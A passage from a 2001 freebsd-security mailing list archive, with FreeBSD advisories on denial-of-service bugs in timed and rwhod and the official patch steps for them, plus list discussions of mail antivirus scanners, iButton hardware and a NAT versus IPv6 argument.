configuration file, or by using network-level packet filtering on the local system using ipfw(8)/ipf(8), or on the perimeter firewalls. V. Solution One of the following: 1) Upgrade your entire ports collection and rebuild the cfengine port. 2) Deinstall the old package and install a new package dated after the correction date, obtained from: [i386] ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/sysutils/cfengine-1.6.3.tar.gz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/sysutils/cfengine-1.6.3.tar.gz [alpha] Packages are not automatically generated for the alpha architecture at this time due to lack of build resources. 3) download a new port skeleton for the cfengine port from: http://www.freebsd.org/ports/ and use it to rebuild the port. 4) Use the portcheckout utility to automate option (3) above. The portcheckout port is available in /usr/ports/devel/portcheckout or the package can be obtained from: ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-4-stable/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/i386/packages-5-current/devel/portcheckout-2.0.tgz ftp://ftp.FreeBSD.org/pub/FreeBSD/ports/alpha/packages-5-current/devel/portcheckout-2.0.tgz -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOq1dclUuHi5z0oilAQFhhAQApfRMj88GYMKiTtLeyjWeaDLFIlDjUTl4 fF1QQNzetOSIoVjA+CsbkTgsX/c8B6Lc7BuTI7K3BLKUu2QC2GbYkn5/ymCdYQeE dW2S00bMdBP6GwURAdFnizezkZq5Y3oEVYXVL4s91M9jb3wCwNOwnbfKH/aegFvL ZOjDvMUdjb0= =yzjS -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 12 15:44:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id DE4F637B719; Mon, 12 Mar 2001 15:44:00 -0800 (PST) (envelope-from security-advisories@FreeBSD.org) Received: (from kris@localhost) by freefall.freebsd.org (8.11.1/8.11.1) id f2CNi0R27619; Mon, 12 Mar 2001 15:44:00 -0800 (PST) (envelope-from security-advisories@FreeBSD.org) Date: Mon, 12 Mar 2001 15:44:00 -0800 (PST) Message-Id: <200103122344.f2CNi0R27619@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory FreeBSD-SA-01:28.timed Reply-To: security-advisories@FreeBSD.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-01:28 Security Advisory FreeBSD, Inc. Topic: timed allows remote denial of service Category: core Module: timed Announced: 2001-03-12 Credits: Discovered during internal source code auditing Affects: All released versions of FreeBSD 3.x, 4.x. FreeBSD 3.5-STABLE prior to the correction date. FreeBSD 4.2-STABLE prior to the correction date. Corrected: 2001-03-10 (FreeBSD 3.5-STABLE) 2001-01-07 (FreeBSD 4.2-STABLE) FreeBSD only: NO I. Background timed(8) is a server for the Time Synchronisation Protocol, for synchronising the system clocks of multiple clients. II. Problem Description Malformed packets sent to the timed daemon could cause it to crash, thereby denying service to clients if timed is not run under a watchdog process which causes it to automatically restart in the event of a failure. The timed daemon is not run in this way in the default invocation from /etc/rc.conf using the timed_enable variable. The timed daemon is not enabled by default, and its use is not recommended (FreeBSD includes ntpd(8), the network time protocol daemon, which provides superior functionality). All versions of FreeBSD 3.x and 4.x prior to the correction date including 3.5.1-RELEASE and 4.2-RELEASE are vulnerable to this problem, if they have been configued to run timed. It was corrected prior to the forthcoming release of FreeBSD 4.3. III. Impact Remote users can cause the timed daemon to crash, denying service to clients. IV. Workaround Implement packet filtering at perimeter firewalls or on the local machine using ipfw(8)/ipf(8) to prevent untrusted users from connecting to the timed service. The timed daemon listens on UDP port 525 by default. V. Solution Upgrade your vulnerable FreeBSD system to 3.5-STABLE or 4.2-STABLE after the respective correction dates. To patch your present system: download the relevant patch from the below location, and execute the following commands as root: # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:28/timed.patch # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:28/timed.patch.asc This patch has been verified to apply to FreeBSD 4.2-RELEASE and FreeBSD 3.5.1-RELEASE. It may or may not apply to older releases. Verify the detached PGP signature using your PGP utility. # cd /usr/src/usr.sbin/timed/timed # patch -p < /path/to/patch # make depend && make all install Kill and restart timed to cause the changes to take effect. If you have started timed with non-standard options (e.g. by setting timed_flags in /etc/rc.conf) then the below command will need to be modified appropriately. # killall -KILL timed # /usr/sbin/timed -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOq1emVUuHi5z0oilAQEYEwP/cPNMQO7LjlEs2/MyxJwVKpQLRzmprJjQ i2QpXEvkZgXSxAcIh15jNsR1TPwUnzCRWHZ5touw0DxTbTbMsnzRVx0/P5jGmQCT 6n5Z11puyEg336zET+tGhVnEt9Ybm7Z/h7Et+njVRTVqbe2AtpFeSbI5NXlZCgs6 ZUYxdLUhfPM= =Dw88 -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 12 15:48:13 2001 Delivered-To: freebsd-security@freebsd.org Received: from freefall.freebsd.org (freefall.freebsd.org [216.136.204.21]) by hub.freebsd.org (Postfix) with ESMTP id 2EFDA37B718; Mon, 12 Mar 2001 15:47:59 -0800 (PST) (envelope-from security-advisories@FreeBSD.org) Received: (from kris@localhost) by freefall.freebsd.org (8.11.1/8.11.1) id f2CNlxe28107; Mon, 12 Mar 2001 15:47:59 -0800 (PST) (envelope-from security-advisories@FreeBSD.org) Date: Mon, 12 Mar 2001 15:47:59 -0800 (PST) Message-Id: <200103122347.f2CNlxe28107@freefall.freebsd.org> X-Authentication-Warning: freefall.freebsd.org: kris set sender to security-advisories@FreeBSD.org using -f From: FreeBSD Security Advisories To: FreeBSD Security Advisories Subject: FreeBSD Security Advisory FreeBSD-SA-01:29.rwhod Reply-To: security-advisories@FreeBSD.org Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org -----BEGIN PGP SIGNED MESSAGE----- ============================================================================= FreeBSD-SA-01:29 Security Advisory FreeBSD, Inc. Topic: rwhod allows remote denial of service Category: core Module: rwhod Announced: 2001-03-12 Credits: Mark Huizer Affects: All released versions of FreeBSD 3.x, 4.x. FreeBSD 3.5-STABLE prior to the correction date. FreeBSD 4.2-STABLE prior to the correction date. Corrected: 2000-12-23 (FreeBSD 3.5-STABLE) 2000-12-22 (FreeBSD 4.2-STABLE) FreeBSD only: NO I. Background rwhod(8) is a server which implements the rwho protocol, which communicates information on system uptime and logged-in users between machines on a network. II. Problem Description Malformed packets sent to the rwhod daemon could cause it to crash, thereby denying service to clients if rwhod is not run under a watchdog process which causes it to automatically restart in the event of a failure. The rwhod daemon is not run in this way in the default invocation from /etc/rc.conf using the rwhod_enable variable. All versions of FreeBSD 3.x and 4.x prior to the correction date including 3.5.1-RELEASE and 4.2-RELEASE are vulnerable to this problem, if they have been configued to run rwhod (this is not enabled by default). III. Impact Remote users can cause the rwhod daemon to crash, denying service to clients. IV. Workaround Implement packet filtering at perimeter firewalls or on the local machine using ipfw(8)/ipf(8) to prevent untrusted users from connecting to the rwhod service. The rwhod daemon listens on UDP port 513 by default. V. Solution Upgrade your vulnerable FreeBSD system to 3.5-STABLE or 4.2-STABLE after the respective correction dates. To patch your present system: download the relevant patch from the below location, and execute the following commands as root: # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:29/rwhod.patch # fetch ftp://ftp.FreeBSD.org/pub/FreeBSD/CERT/patches/SA-01:29/rwhod.patch.asc This patch has been verified to apply to FreeBSD 4.2-RELEASE and FreeBSD 3.5.1-RELEASE. It may or may not apply to older releases. Verify the detached PGP signature using your PGP utility. # cd /usr/src/usr.sbin/rwhod # patch -p < /path/to/patch # make depend && make all install Kill and restart rwhod to cause the changes to take effect. If you have started rwhod with non-standard options (e.g. by setting rwhod_flags in /etc/rc.conf) then the below command will need to be modified appropriately. # killall -KILL rwhod # /usr/sbin/rwhod -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.4 (FreeBSD) Comment: For info see http://www.gnupg.org iQCVAwUBOq1fmlUuHi5z0oilAQG05QP/bQpUXpXc+X3/k/jbqgxjNOXwfzYRwNph trCjRBKDKZrBGvlS2mTSbyisn6Rcv5PhigVAmU7sllrrXmYDCuMjNoMQqIhRwMax ojaklsg6F8rX3zNwUlaQp45ZYiJ9Zi34kkRRnZQ5oAFciS6I/3tYnP9t0Sedbbsi V/na+hI/Gtk= =TskQ -----END PGP SIGNATURE----- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 12 19: 5:18 2001 Delivered-To: freebsd-security@freebsd.org Received: from bsdie.rwsystems.net (bsdie.rwsystems.net [209.197.223.2]) by hub.freebsd.org (Postfix) with ESMTP id 2096837B71A for ; Mon, 12 Mar 2001 19:05:14 -0800 (PST) (envelope-from jwyatt@rwsystems.net) Received: from bsdie.rwsystems.net([209.197.223.2]) (1999 bytes) by bsdie.rwsystems.net via sendmail with P:esmtp/R:bind_hosts/T:inet_zone_bind_smtp (sender: ) id for ; Mon, 12 Mar 2001 21:04:03 -0600 (CST) (Smail-3.2.0.111 2000-Feb-17 #1 built 2000-Jun-25) Date: Mon, 12 Mar 2001 21:04:02 -0600 (CST) From: James Wyatt To: Will Mitayai Keeso Rowe Cc: freebsd-security@freebsd.org Subject: Re: Virus Scanning Software for FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; CHARSET=US-ASCII Content-ID: Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org I have an eval copy of a product that looks promising: Sohpos antivirus. http://www.sophos.com/products/antivirus/savunix.html You can use the SAVI (API for virus checking) to scan email according to the description at: http://www.sophos.com/products/antivirus/savi/ Their licensing looks fair and the sales person assigned to me has been politely helpful and not overly insistant. Everything I've looked at so far looks great, but the customer that wanted it has had delays and now wants to wait for FreeBSD 4.3-RELEASE to install things on their server. Updates are monthly CDs and urgent updates are available as downloads. Our intent is to have it go after SMTP, HTTP, and FTP if we can and to scan the Samba partitions for file infections. It handles uSoft Office products like Word(tm) docs and such. Best of all, they support FreeBSD so we should support them, right? - Jy@ On Mon, 12 Mar 2001, Will Mitayai Keeso Rowe wrote: > Is anyone aware of any virus scanning solutions for freebsd, particularly > solutions for email? I don;t trust my users not to follow proper email > guidelines, and thus would like to stop email at the server before they get > delivered the message. > > Regards, > Mit > > -- > Will Mitayai Keeso Rowe > > For full contact information, please visit: > http://my.infotriever.com/mitayai To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 12 20:34:44 2001 Delivered-To: freebsd-security@freebsd.org Received: from w2xo.pgh.pa.us (18.gibs5.xdsl.nauticom.net [209.195.184.19]) by hub.freebsd.org (Postfix) with ESMTP id 0B67A37B71C for ; Mon, 12 Mar 2001 20:34:36 -0800 (PST) (envelope-from durham@w2xo.pgh.pa.us) Received: from shazam (shazam [192.168.5.3]) by w2xo.pgh.pa.us (8.11.2/8.9.3) with ESMTP id f2D4XOq36759; Tue, 13 Mar 2001 04:33:24 GMT (envelope-from durham@w2xo.pgh.pa.us) Date: Mon, 12 Mar 2001 23:35:38 -0500 (EST) From: Jim Durham X-Sender: durham@shazam.int To: James Wyatt Cc: Will Mitayai Keeso Rowe , freebsd-security@FreeBSD.ORG Subject: Re: Virus Scanning Software for FreeBSD In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org On Mon, 12 Mar 2001, James Wyatt wrote: > I have an eval copy of a product that looks promising: Sohpos antivirus. > > http://www.sophos.com/products/antivirus/savunix.html > > You can use the SAVI (API for virus checking) to scan email according to > the description at: > > http://www.sophos.com/products/antivirus/savi/ > > Their licensing looks fair and the sales person assigned to me has been > politely helpful and not overly insistant. Everything I've looked at so > far looks great, but the customer that wanted it has had delays and now > wants to wait for FreeBSD 4.3-RELEASE to install things on their server. > > Updates are monthly CDs and urgent updates are available as downloads. > > Our intent is to have it go after SMTP, HTTP, and FTP if we can and to > scan the Samba partitions for file infections. It handles uSoft Office > products like Word(tm) docs and such. > > Best of all, they support FreeBSD so we should support them, right? - Jy@ > > On Mon, 12 Mar 2001, Will Mitayai Keeso Rowe wrote: > > Is anyone aware of any virus scanning solutions for freebsd, particularly > > solutions for email? I don;t trust my users not to follow proper email > > guidelines, and thus would like to stop email at the server before they get > > delivered the message. > > I am using Sophos, and Amavis at our company. It is working very well. Sophos supports Windoze, Mac, Linux, FreeBSD, even VMS and OS2! You have Sendmail call Amavis for all incoming mail. Amavis unpacks and scans all attachments, even zipped and rar'ed and so forth, then delivers the mail to the user's mailbox if it's OK. Otherwise, it mails either the originator of the virus mail and/or the administrator and saves the virus mail for perusal. Works very well, but you need a little horsepower on the server. Our company sends around huge Autocad drawings and Excel spreadsheets and they all have to be "unattached" and scanned. I'm also using the Sophos Intercheck daemon. You put the Sophos CD in any workstation on your LAN, pick a directory on the server in which to install the Sophos setup stuff and Intercheck stuff. Then you install all the workstations (including the one you used to generate the server setup directory) from the server (running SAMBA of course!). Now, when a user logs into the M$ domain on Samba, any updates will be automatically downloaded to the workstation. I update several times daily from the Sophos site. When Sophos is first run on the workstation, it builds a file list. Any time the list is modified, it refers it to the intercheck daemon on the server for virus sweeping. Of course, any e-mail attachment that was unpacked would be scanned immediately, as it wouldn't be on the "safe" list. Works well.. Jim Durham To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 12 21: 5:36 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp011.mail.yahoo.com (smtp011.mail.yahoo.com [216.136.173.31]) by hub.freebsd.org (Postfix) with SMTP id 2BCF337B719 for ; Mon, 12 Mar 2001 21:05:32 -0800 (PST) (envelope-from neve_ripe@yahoo.com) Received: from f2f.tsua.net (HELO never) (212.40.34.58) by smtp.mail.vip.sc5.yahoo.com with SMTP; 13 Mar 2001 05:05:31 -0000 X-Apparently-From: Date: Tue, 13 Mar 2001 07:05:24 +0200 From: Alexandr Kovalenko X-Mailer: The Bat! (v1.49) UNREG / CD5BF9353B3B7091 Reply-To: Alexandr Kovalenko Organization: UIC Group X-Priority: 3 (Normal) Message-ID: <060144903.20010313070524@yahoo.com> To: "Will Mitayai Keeso Rowe" Cc: freebsd-security@freebsd.org Subject: Re: Virus Scanning Software for FreeBSD In-reply-To: References: Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello Will, Monday, March 12, 2001, 11:56:43 PM, you wrote: WMKR> Is anyone aware of any virus scanning solutions for freebsd, particularly WMKR> solutions for email? I don;t trust my users not to follow proper email WMKR> guidelines, and thus would like to stop email at the server before they get WMKR> delivered the message. There is antivirus software calles AVP, it has versions for FreeBSD 4.x and 3.x. It has good virus base (for now ~45000). It can be itercorporated with sendmail too. See http://www.kaspersky.com/ for details. -- Best regards, Alexandr mailto:neve_ripe@yahoo.com _________________________________________________________ Do You Yahoo!? Get your free @yahoo.com address at http://mail.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 12 21:33:33 2001 Delivered-To: freebsd-security@freebsd.org Received: from gull.prod.itd.earthlink.net (gull.prod.itd.earthlink.net [207.217.121.85]) by hub.freebsd.org (Postfix) with ESMTP id B5B1F37B718 for ; Mon, 12 Mar 2001 21:33:30 -0800 (PST) (envelope-from dhagan@colltech.com) Received: from colltech.com (1Cust6.tnt4.clarksburg.wv.da.uu.net [63.15.39.6]) by gull.prod.itd.earthlink.net (EL-8_9_3_3/8.9.3) with ESMTP id VAA13553 for ; Mon, 12 Mar 2001 21:33:29 -0800 (PST) Message-ID: <3AADB1D3.C70E00C@colltech.com> Date: Tue, 13 Mar 2001 00:36:19 -0500 From: Daniel Hagan X-Mailer: Mozilla 4.73 [en] (WinNT; U) X-Accept-Language: en MIME-Version: 1.0 To: freebsd-security@freebsd.org Subject: iButton Development Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org There was some discussion regarding iButtons in mid-Jan on this list. I'm interested in getting one or more of these things to play with, with the goal of: o Authenticating myself to my home workstations (pam module?). o Storing PGP & ssh keys. Since I assume these are tasks of interest to more people than just myself, I was wondering: o Does anyone have existing code bases to support these tasks? o Is there any support (in the political sense) for getting the pam module and/or other code incorporated into the base system or as a port? o Does anyone have any recommendations on what hardware to procure for these tasks? I was looking at getting a serial port BlueDot (possibly two or three, I have some laptops I may want to use this with too) and a DS1996L-F5 64-kbit Memory iButton. I would also think about getting a Java-powered iButton, Model 96, Release 1.1 (or 2.2) if I understood exactly what I'd be getting for the money. Does anyone have any information/examples on how these Java iButtons are used? Thanks, Daniel To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 12 22:34:14 2001 Delivered-To: freebsd-security@freebsd.org Received: from server.mbg.com.ge (server.mbg.com.ge [212.72.131.237]) by hub.freebsd.org (Postfix) with SMTP id 8DB5C37B718 for ; Mon, 12 Mar 2001 22:34:03 -0800 (PST) (envelope-from nugzar@mbg.com.ge) Received: (qmail 10694 invoked from network); 13 Mar 2001 06:59:30 -0000 Received: from unknown (HELO nugzar) (192.168.170.152) by server.mbg.com.ge with SMTP; 13 Mar 2001 06:59:30 -0000 Date: Tue, 13 Mar 2001 10:34:00 +0400 From: Nugzar Nebieridze X-Mailer: The Bat! (v1.44) UNREG / CD5BF9353B3B7091 Reply-To: Nugzar Nebieridze X-Priority: 3 (Normal) Message-ID: <1363890484.20010313103400@mbg.com.ge> To: freebsd-security@freebsd.org Subject: Re[2]: Virus Scanning Software for FreeBSD In-reply-To: <060144903.20010313070524@yahoo.com> References: <060144903.20010313070524@yahoo.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello Alexandr, Tuesday, March 13, 2001, 9:05:24 AM, you wrote: AK> Hello Will, AK> Monday, March 12, 2001, 11:56:43 PM, you wrote: WMKR>> Is anyone aware of any virus scanning solutions for freebsd, particularly WMKR>> solutions for email? I don;t trust my users not to follow proper email WMKR>> guidelines, and thus would like to stop email at the server before they get WMKR>> delivered the message. AK> There is antivirus software calles AVP, it has versions for FreeBSD AK> 4.x and 3.x. It has good virus base (for now ~45000). It can be AK> itercorporated with sendmail too. AK> See http://www.kaspersky.com/ for details. This company provides AntiVirus software for Windows, FreeBSD and Linux. If you server is heavily loaded then they are also providing a daemon AVP that loads its databases only once when you start it and then you can connect to its socket and pass data to check on viruses. It requires less computer resources. It is not free, but you can download demo version that will be able to detect viruses only but not disinfect them... Hope it helps. Nugzar To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 12 22:52:22 2001 Delivered-To: freebsd-security@freebsd.org Received: from daedalus.cs.brandeis.edu (daedalus.cs.brandeis.edu [129.64.3.179]) by hub.freebsd.org (Postfix) with ESMTP id BC4CF37B750 for ; Mon, 12 Mar 2001 22:52:13 -0800 (PST) (envelope-from meshko@daedalus.cs.brandeis.edu) Received: from localhost (meshko@localhost) by daedalus.cs.brandeis.edu (8.9.3/8.9.3) with ESMTP id BAA04636; Tue, 13 Mar 2001 01:51:57 -0500 Date: Tue, 13 Mar 2001 01:51:57 -0500 (EST) From: Mikhail Kruk To: Nugzar Nebieridze Cc: Subject: Re: Re[2]: Virus Scanning Software for FreeBSD In-Reply-To: <1363890484.20010313103400@mbg.com.ge> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org > AK> See http://www.kaspersky.com/ for details. ...off-topic... but I remember the first antivirus made by this guy, Kaspersky... if I'm not mistaken, it was a MS DOS TSR program written in Pascal which monitored interrup handlers, writes to MBR etc... To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Mon Mar 12 23: 4:54 2001 Delivered-To: freebsd-security@freebsd.org Received: from mail.freebsd-corp-net-guide.com (mail.freebsd-corp-net-guide.com [206.29.169.15]) by hub.freebsd.org (Postfix) with ESMTP id 33F7C37B718; Mon, 12 Mar 2001 23:04:48 -0800 (PST) (envelope-from tedm@toybox.placo.com) Received: from tedm.placo.com (nat-rtr.freebsd-corp-net-guide.com [206.29.168.154]) by mail.freebsd-corp-net-guide.com (8.11.1/8.11.1) with SMTP id f2D723N18585; Mon, 12 Mar 2001 23:02:03 -0800 (PST) (envelope-from tedm@toybox.placo.com) From: "Ted Mittelstaedt" To: "Bob Van Valzah" , "pW" Cc: , Subject: RE: Racoon Problem & Cisco Tunnel Date: Mon, 12 Mar 2001 23:02:03 -0800 Message-ID: <000801c0ab8b$81d99ca0$1401a8c0@tedm.placo.com> MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: 7bit X-Priority: 3 (Normal) X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook 8.5, Build 4.71.2173.0 In-Reply-To: <3AACF40D.4080504@Talarian.Com> X-MimeOLE: Produced By Microsoft MimeOLE V4.72.3155.0 Importance: Normal Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org >-----Original Message----- >From: owner-freebsd-questions@FreeBSD.ORG >[mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Bob Van Valzah >Sent: Monday, March 12, 2001 8:07 AM >To: pW >Cc: FreeBSD-Security@FreeBSD.ORG; FreeBSD-Questions@FreeBSD.ORG >Subject: Re: Racoon Problem & Cisco Tunnel > > >Yes. The five DSL setups with which I'm familiar all grant at least one >public address per house. I believe all are static, but one might be >dynamic. Interference with protocols like IPSec is one of the reasons >why I'd make a public address a requirement when choising a DSL >provider. When it comes to NAT, I'm with Vint Cerf--avoid it if at all >possible. Let's hasten the deployment of IPv6. > I'd agree with you if everyone that would have to do a renumber of a large network from IPv4 to IPv6 had Vint Cerf's money. When your retired like him with money coming out your arse-hole you can afford to make irresponsible statements like that. Unfortunately, what people like him don't understand is that the burden of renumbering the fabric of the Internet from IPv4 to IPv6 will fall largely on people like me - who have thousands of customers and tens of thousands of public IP numbers spread out among all of them - and who don't have the money to support something this audacious. I can almost guarentee that whatever ISP that I am working for when this finally happens is going to go out of business, all it's going to do is put thousands of smaller to medium-sized ISP's into bankruptcy and let people like AOL who have money coming out their arse-holes virtually monopolize Internet access in the world. Until I see the large organizations with Class A's tied up, give up those numbers back to the pool, I'll fight any attempt to move from IPv4 to IPv6, and most other ISP's that are out there are going to fight it as well. In the meantime I'm pushing all my customers into using NAT. NAT is here to stay and people that run around calling it an aberration are just proving to the rest of us that they have absolutely no business sense. NAT has proven itself reliable and vital and idiot engineers that design TCP protocols that assume everyone has a public IP number are just architecting their own failures, and their protocol's subsequent minimizing by the market. I have some sympathy for protocols like IPSec that came to be during the same time - but organizational-to-organizational IPSec tunnels don't have to pass through the NAT - they can terminate on it. But, anyone doing a new protocol today is a fool if it can't work though a NAT. Ted Mittelstaedt tedm@toybox.placo.com Author of: The FreeBSD Corporate Networker's Guide Book website: http://www.freebsd-corp-net-guide.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 5:27: 7 2001 Delivered-To: freebsd-security@freebsd.org Received: from phk.freebsd.dk (phk.freebsd.dk [212.242.86.136]) by hub.freebsd.org (Postfix) with ESMTP id CE27437B725 for ; Tue, 13 Mar 2001 05:26:59 -0800 (PST) (envelope-from phk@critter.freebsd.dk) Received: from critter.freebsd.dk (critter.freebsd.dk [212.242.86.163]) by phk.freebsd.dk (8.9.3/8.9.3) with ESMTP id OAA42540; Tue, 13 Mar 2001 14:26:57 +0100 (CET) (envelope-from phk@critter.freebsd.dk) Received: from critter (localhost [127.0.0.1]) by critter.freebsd.dk (8.11.1/8.11.1) with ESMTP id f2DDREp06942; Tue, 13 Mar 2001 14:27:15 +0100 (CET) (envelope-from phk@critter.freebsd.dk) To: Daniel Hagan Cc: freebsd-security@FreeBSD.ORG Subject: Re: iButton Development In-Reply-To: Your message of "Tue, 13 Mar 2001 00:36:19 EST." <3AADB1D3.C70E00C@colltech.com> Date: Tue, 13 Mar 2001 14:27:14 +0100 Message-ID: <6940.984490034@critter> From: Poul-Henning Kamp Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In message <3AADB1D3.C70E00C@colltech.com>, Daniel Hagan writes: >There was some discussion regarding iButtons in mid-Jan on this list. >I'm interested in getting one or more of these things to play with, with >the goal of: The best I can suggest you is that we rally all efforts around: http://anoncvs.aldigital.co.uk/iBLab/ -- Poul-Henning Kamp | UNIX since Zilog Zeus 3.20 phk@FreeBSD.ORG | TCP/IP since RFC 956 FreeBSD committer | BSD since 4.3-tahoe Never attribute to malice what can adequately be explained by incompetence. To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Tue Mar 13 5:47:47 2001 Delivered-To: freebsd-security@freebsd.org Received: from smtp.whitebarn.com (Spin.whitebarn.com [216.0.13.113]) by hub.freebsd.org (Postfix) with ESMTP id E8C3237B72D; Tue, 13 Mar 2001 05:47:35 -0800 (PST) (envelope-from Bob@Talarian.Com) Received: from Talarian.Com (Relent.Bob.whitebarn.com [216.0.13.50]) by smtp.whitebarn.com (8.9.3/8.9.3) with ESMTP id HAA38781; Tue, 13 Mar 2001 07:47:19 -0600 (CST) (envelope-from Bob@Talarian.Com) Message-ID: <3AAE24E6.9080802@Talarian.Com> Date: Tue, 13 Mar 2001 07:47:18 -0600 From: Bob Van Valzah User-Agent: Mozilla/5.0 (X11; U; Linux 2.2.12 i386; en-US; 0.8) Gecko/20010215 X-Accept-Language: en MIME-Version: 1.0 To: Ted Mittelstaedt Cc: pW , FreeBSD-Security@FreeBSD.ORG, FreeBSD-Questions@FreeBSD.ORG Subject: Re: Racoon Problem & Cisco Tunnel References: <000801c0ab8b$81d99ca0$1401a8c0@tedm.placo.com> Content-Type: multipart/alternative; boundary="------------080107090808010207030409" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org --------------080107090808010207030409 Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Ted, Loved the book--can't wait for the movie! This is a religious war that's been fought many times before. Since my last answer was too flip, I'll clarify my point of view. IPv4, IPv6, and NAT are all just tools that I have to apply with "business sense." NAT's not inherently evil, nor is IPv6. Their sensibility will change over time and depend upon the application. If I were shopping for DSL for "my mom," I wouldn't care if she got a public address or not. Reliability and good support (as a "little guy" can more often provide) would be more important. But when I'm shopping for DSL for a work-from-home, multicast protocol stack developer, a public address is a requirement. In fact, it's something I'll pay extra to get. For my business, IPSec is important and hence having at least one public address is important. My protocol developers have a few LANs at home and we happily use NAT there. I wouldn't pay extra to get enough address space to put public addresses on all their home lab machines. An ISP who won't give me at least one public address is just limiting where I can apply their service. An ISP who gives me one or more public addresses let's me pick the point at which I want to apply NAT. So in spite of my flip remarks, I hope you can see that I do use NAT--I just put it off to the last minute where it doesn't make business sense to avoid it. Bob Ted Mittelstaedt wrote: >> -----Original Message----- >> From: owner-freebsd-questions@FreeBSD.ORG >> [mailto:owner-freebsd-questions@FreeBSD.ORG]On Behalf Of Bob Van Valzah >> Sent: Monday, March 12, 2001 8:07 AM >> To: pW >> Cc: FreeBSD-Security@FreeBSD.ORG; FreeBSD-Questions@FreeBSD.ORG >> Subject: Re: Racoon Problem & Cisco Tunnel >> >> >> Yes. The five DSL setups with which I'm familiar all grant at least one >> public address per house. I believe all are static, but one might be >> dynamic. Interference with protocols like IPSec is one of the reasons >> why I'd make a public address a requirement when choising a DSL >> provider. When it comes to NAT, I'm with Vint Cerf--avoid it if at all >> possible. Let's hasten the deployment of IPv6. >> > > I'd agree with you if everyone that would have to do a renumber of a > large network from IPv4 to IPv6 had Vint Cerf's money. When your retired > like him with money coming out your arse-hole you can afford to make > irresponsible statements like that. > > Unfortunately, what people like him don't understand is that the burden of > renumbering the fabric of the Internet from IPv4 to IPv6 will fall largely > on people like me - who have thousands of customers and tens of thousands of > public IP numbers spread out among all of them - and who don't have the > money to support something this audacious. I can almost guarentee that > whatever ISP that I am working for when this finally happens is going to go > out of business, all it's going to do is put thousands of smaller to > medium-sized ISP's into bankruptcy and let people like AOL who have money > coming out their arse-holes virtually monopolize Internet access in the > world. > > Until I see the large organizations with Class A's tied up, give up those > numbers back to the pool, I'll fight 